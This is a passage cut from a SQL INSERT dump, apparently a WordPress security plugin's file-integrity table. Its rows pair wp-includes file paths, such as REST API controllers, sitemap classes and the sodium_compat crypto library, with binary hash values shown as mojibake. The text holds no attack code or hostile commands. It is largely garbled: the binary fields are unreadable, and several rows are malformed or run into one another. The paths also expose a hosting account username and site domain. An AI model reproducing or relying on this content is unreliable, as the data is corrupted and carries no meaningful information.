o\\#Bs','',0,'?'),('gQir똿/!','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U3FC#\n^',':pph`uMJDmrqsr_?A','',0,'?'),('CciFh .n7','wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\nhMX$','_:&Ќ0)P$Lm:_d8-','',0,'?'),('A8V,_OX4','wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-sidebars-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t@~G|TAB','dd0­_SfTTuna{PI4=}','',0,'?'),('_ \0*O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2k Fm=Pu8','^<\ZC/a as|Vs:','',0,'?'),('q_\" 1F','wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+{RNa','$\'@οoeА~S1pty>Ի#&V','',0,'?'),('aƔ\0a\'\\?','wp-includes/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-template-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01P_mrw)\Z','K$̪սRe 8Oy_Yoazj ','',0,'?'),('@\'vY!ѵ','wp-includes/rest-api/endpoints/class-wp-rest-template-revisions-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-template-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h)Ol$]s[2_',',vT ?cD}KO.x\r79','',0,'?'),('f W5\ra R\nK','wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\nN_\rz);V','2ĥ\'*FA*ԫ 2p','',0,'?'),('\Z,zҐU','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TG(+U3\Z+','\rJJL?9?e4äĀM','',0,'?'),('wesi ','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tcR~C','|&@:_\rInd8Ubl\n','',0,'?'),('sy%#r=','wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-widget-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oxC\\^2','Ve/V+ww$oH','',0,'?'),('l]g SDn','wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/endpoints/class-wp-rest-widgets-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1qQJ)ya__,','0`|\'8=Β<Q|`Է1pT','',0,'?'),(',f','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y2eRۻI','Rws5Ǩ6ТKxi,u|','',0,'?'),('ͪuowsFCG[c','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R;L|MTU','T9YkvRKg;T; ','',0,'?'),('\njݍea!\ZWdq','wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٶhrdGͶ','_7 2w-Tb -710εAf','',0,'?'),('WMF`3$','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2CECZ6e','\\W.£;\\ K[zHEI8 A','',0,'?'),('I6.:\n(i\0B','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Z)*jD','z7cb{9\ZJ0ӣ7}\"ϽR[\n[','',0,'?'),('\r<: -{̖H','wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3°\nᄷ\0a','` \\XOU>8X.f?m{\nQ]8','',0,'?'),('Gu5aԯ','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M?=Iuw9','!n>vڄw֦7Cy5=ks','',0,'?'),('YUL5Jޔv[','wp-includes/rest-api/search/class-wp-rest-search-handler.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/search/class-wp-rest-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' $[wLua','ˍ^ ;\0d2Œ43s.~$[Z\"','',0,'?'),('bN8hk','wp-includes/rest-api/search/class-wp-rest-term-search-handler.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ihM','\\9!Tz$hS^F \n剾','',0,'?'),('Ú2d=','wp-includes/rest-api.php','/home/tummmyov/tummyrevolution.com/wp-includes/rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\8$Mħ=fմ','1o ,>$ȕa0=}b','',0,'?'),('_\0 d MP~D','wp-includes/revision.php','/home/tummmyov/tummyrevolution.com/wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2/%6xI۫','\nQ Ï(/I\"&{iR^ܾ\'\r','',0,'?'),(')Oz=u˷','wp-includes/rewrite.php','/home/tummmyov/tummyrevolution.com/wp-includes/rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C*Z','f\rRf|ccN];x~x','',0,'?'),('OIY\\{=H','wp-includes/robots-template.php','/home/tummmyov/tummyrevolution.com/wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӎ| Ylm+6V','X6hq@!`+\rx! Еī>','',0,'?'),('w\'6)','wp-includes/rss-functions.php','/home/tummmyov/tummyrevolution.com/wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr62\']el#','~^Ɏ f}nBhi=F\n ^,','',0,'?'),('A1\Z;','wp-includes/rss.php','/home/tummmyov/tummyrevolution.com/wp-includes/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'e=R:_','l\'SlTn|A_9sd:/3','',0,'?'),('9} B^? \" ','wp-includes/script-loader.php','/home/tummmyov/tummyrevolution.com/wp-includes/script-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!giFॳ','A*`%i7dRLHc\\Ii','',0,'?'),('Eh@aq','wp-includes/session.php','/home/tummmyov/tummyrevolution.com/wp-includes/session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NRM<\\>','}k+8MU=<;tI*,4#','',0,'?'),('Vne!z0u1?','wp-includes/shortcodes.php','/home/tummmyov/tummyrevolution.com/wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gZ=&>iFcB','1Of4;FOѦKН','',0,'?'),('HdoC Z','wp-includes/sitemaps/class-wp-sitemaps-index.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/class-wp-sitemaps-index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{Zɬ>MhʢhO','\"lEUd(\ZZ#T O \r>gW','',0,'?'),(' J;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@\r-90','LL{VG5nXߺAP*','',0,'?'),('\n]Eg7Oqb','wp-includes/sitemaps/class-wp-sitemaps-registry.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S$\nX\'(','a:!XA2Y[n\ne,ASI$.','',0,'?'),('/fPj>X','wp-includes/sitemaps/class-wp-sitemaps-renderer.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=^-|','*k$xFҟ\'qV <[7!','',0,'?'),('Q-C -]C','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E/i?ݶ83|E]','C#OKKؗB.FYƉ+EwFKY9.','',0,'?'),(' /?^EՑ','wp-includes/sitemaps/class-wp-sitemaps.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Y!aD8|x&q','-?\rӛ\nxYz!Uv','',0,'?'),('OOM_K7n','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\ruW1',' B\rJe1*w`uH^Os-\r5','',0,'?'),('\r[\0EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=ͱȪ\\$\\\Z1','Ou89.8Wy\"c','',0,'?'),('6ƌC+','wp-includes/sitemaps/providers/class-wp-sitemaps-users.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sHouGk','5JE4߇YoX #T','',0,'?'),('yunc[٧','wp-includes/sitemaps.php','/home/tummmyov/tummyrevolution.com/wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`S EX^YA','%Six3kOnz]','',0,'?'),('1БY4I^p','wp-includes/sodium_compat/LICENSE','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0?4\'+̶L)$','Y ORٴ@M=xMK\Z.','',0,'?'),('#iUfzhJF','wp-includes/sodium_compat/autoload-php7.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4','-r*H^Oq &h06\"<','',0,'?'),('V\r3#J{','wp-includes/sodium_compat/composer.json','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' X7{(G5','5-','',0,'?'),('A;ت\Zܦz','wp-includes/sodium_compat/lib/constants.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{#l>m','ٹmc(l\'mtˣ[gW','',0,'?'),('\0?H\0E}\"','wp-includes/sodium_compat/lib/namespaced.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01vnG\r',']/r~ʺOCcxBj/oUI*','',0,'?'),('P\neu\"','wp-includes/sodium_compat/lib/php72compat.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pWdt1','D㳌*z6ؕ(A\\) iÏܜo,','',0,'?'),('ÂuJM/ wy','wp-includes/sodium_compat/lib/php72compat_const.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' p{[˔ ','9oGfpmeG#`:Q{`','',0,'?'),('BWk\rZ{','wp-includes/sodium_compat/lib/ristretto255.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/lib/ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a3pwypo| i','$ 3o383iQ\Z)[e','',0,'?'),(',!#QP[;','wp-includes/sodium_compat/lib/sodium_compat.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&~.@Y$','bYu\"]FOi<^&!l*~\0f5','',0,'?'),('C #aS[','wp-includes/sodium_compat/lib/stream-xchacha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/lib/stream-xchacha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^=$ T','/~U]Nn:}s','',0,'?'),('wj067@T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"2s7\\i #E','atW 3N\Z`xhI`','',0,'?'),('vifuP0^>d','wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SG ˺F','[(R $2otb','',0,'?'),('B^tpk!','wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R*LTG4%P','-nFJ&TPo\\ϓ\\2','',0,'?'),('K\r\\Uz\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V*F谯5o𽃐_T9L~;e7','',0,'?'),('kIKV[ 5','wp-includes/sodium_compat/namespaced/Core/Ed25519.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' v>#!n(','DFUu|v/]2x_ERL2QlP93s 15','',0,'?'),('ب&G)k{','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h P','Kd%.RAOFjo-','',0,'?'),(' O忯uRc[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[clru Сu^','6p\'`+*[AG4^6Ŋ%C','',0,'?'),('r@DZ 䯩','wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!K 5yS*','TyO%u;U}g1) Z','',0,'?'),('70, M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy?;8V\n','\0-]뮳XEt)`1C}Mr2/','',0,'?'),('rtIŒg[;?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rVNck0}/Ճ','nKkZ  N$ EКe$','',0,'?'),('6?^o#','wp-includes/sodium_compat/namespaced/Core/SipHash.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r -er^!~','`RlԥLz?iāACH󞮣Pyn','',0,'?'),('3p\\8lDq','wp-includes/sodium_compat/namespaced/Core/Util.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';*kLwB d=','ec[dM?H|KY\04@ QA:FF ','',0,'?'),('5Vx,$>7dk','wp-includes/sodium_compat/namespaced/Core/X25519.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb9M','F/\'M%9}@fW> S*m','',0,'?'),('xz#]ru?0O','wp-includes/sodium_compat/namespaced/Core/XChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h g`ɸ:ڕ^','F/QH\0^l 0BΓի 6S@Ph','',0,'?'),('2:','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b4\'&','ۼ4P\'hNa>E5ఛ','',0,'?'),('iBj]','wp-includes/sodium_compat/namespaced/Crypto.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G8J+ z','>8\'XiUbGн,','mn5ߐ֞βgJ\\3','',0,'?'),('&DQRw]','wp-includes/sodium_compat/src/Core/ChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-rjiIأeb','bE&q*','',0,'?'),('$[tCŤIw','wp-includes/sodium_compat/src/Core/Curve25519/Fe.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QtzQ\"',' }؟Zl(y0Ũz7{d6Ynrh\\','',0,'?'),('D= SC','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%X`йKZ','SW,fK{\\^Y/','',0,'?'),('zL5 g5Ď','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','trIbw\'-7','uS{<n\r߅+-#; ᷃QЮ','',0,'?'),('yO\0yjeB\nVp','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eƀkvk\r',' iiLMP4ިO_!iN ','',0,'?'),('U\\aE','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wͱr0؅=','?E%+w\r^֗.$i$[W','',0,'?'),('uRlt\"','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7֊i[L9ƁH ','߹{8(Ïat\0Cn3Qڤ\nl?$y','',0,'?'),('RjqIӏ\ZY&','wp-includes/sodium_compat/src/Core/Curve25519/H.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\rJ`X\"8by','oHiYN3 >_J,S^','',0,'?'),(']R>w.EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yϛvj\n','S x^V>m!-qDeV','',0,'?'),('ᕵ7\\F|[El','wp-includes/sodium_compat/src/Core/Curve25519.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=`v\ZC','xӡU\ruXaLq&\0-N','',0,'?'),('5.=d)]','Œq㋵\'NN{QN','',0,'?'),('.I\nfqM9','wp-includes/sodium_compat/src/Core/Poly1305.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!iLV=X+ v0~','4-<4,\"VȱXʘîhR KFk','',0,'?'),('̸-]\Zn','wp-includes/sodium_compat/src/Core/Ristretto255.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Ristretto255.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k9wZ~ \'',' z`WN?]ӟB,KJlW>k','',0,'?'),('Ѻɩ uy}','wp-includes/sodium_compat/src/Core/Salsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' b5lJ#v','c=0-#-TSX&4\0K8\r','',0,'?'),('sC<:<A','wp-includes/sodium_compat/src/Core/SecretStream/State.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Z{5o',' <s6\0, RauhXc','',0,'?'),('%..Ct=\\`','wp-includes/sodium_compat/src/Core/SipHash.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cJ>|Eqv0|bv ','ܟjpeMN?aXi+!S2','',0,'?'),('J-狁\\\"ץ&','wp-includes/sodium_compat/src/Core/Util.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&RЄsuT-&3B','Dy)?3>\'9\'qu|D7+C','',0,'?'),('\0GM(YlWz!','wp-includes/sodium_compat/src/Core/X25519.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ:!ټ','3l@o-3SՏ&!','',0,'?'),('ǝQ_yd+','wp-includes/sodium_compat/src/Core/XChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XU iU0ll9c','_v$U7_*\r?+^≾Ā','',0,'?'),('ρXn\r?','wp-includes/sodium_compat/src/Core/XSalsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pƮuo7;~z',' %ly\'#[_{E]8%','',0,'?'),('ЬpIYR','wp-includes/sodium_compat/src/Core32/BLAKE2b.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FKy\"J','~T)_ԇYH+ɏ\' ;','',0,'?'),('g\ZŞ|q(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zWM&836','TR@peS`FaױC>+V%8JyQ','',0,'?'),(' e-\nyV','wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Wwb>EyJ','\'~6ȝ\nBagzdQ','',0,'?'),('v#qȃ','wp-includes/sodium_compat/src/Core32/ChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EOxٕX2떭؃','xaJN!e\"\"Nq}AMC1){j','',0,'?'),('I 2RNjY','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c+9O˚d/R\n','>s$/C yv','',0,'?'),('=}LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*EsU)H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y$NXll','[-v5#Bb','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۓGc,=c^','Gct(5\n,9%)e','',0,'?'),('!h>iq8tn','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>@UeU','țp˄o0} 8:e)TN/z','',0,'?'),('nۗvXH)','wp-includes/sodium_compat/src/Core32/Curve25519/README.md','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yϛvj\n','S x^V>m!-qDeV','',0,'?'),('\09k5&ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','43k&t8p','j+JL¦{׹\ZI]ً=','',0,'?'),('I/\ZN2 p','wp-includes/sodium_compat/src/Core32/Ed25519.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*e/','1he+ :za ͣ4@','',0,'?'),('\"0\0L\'M 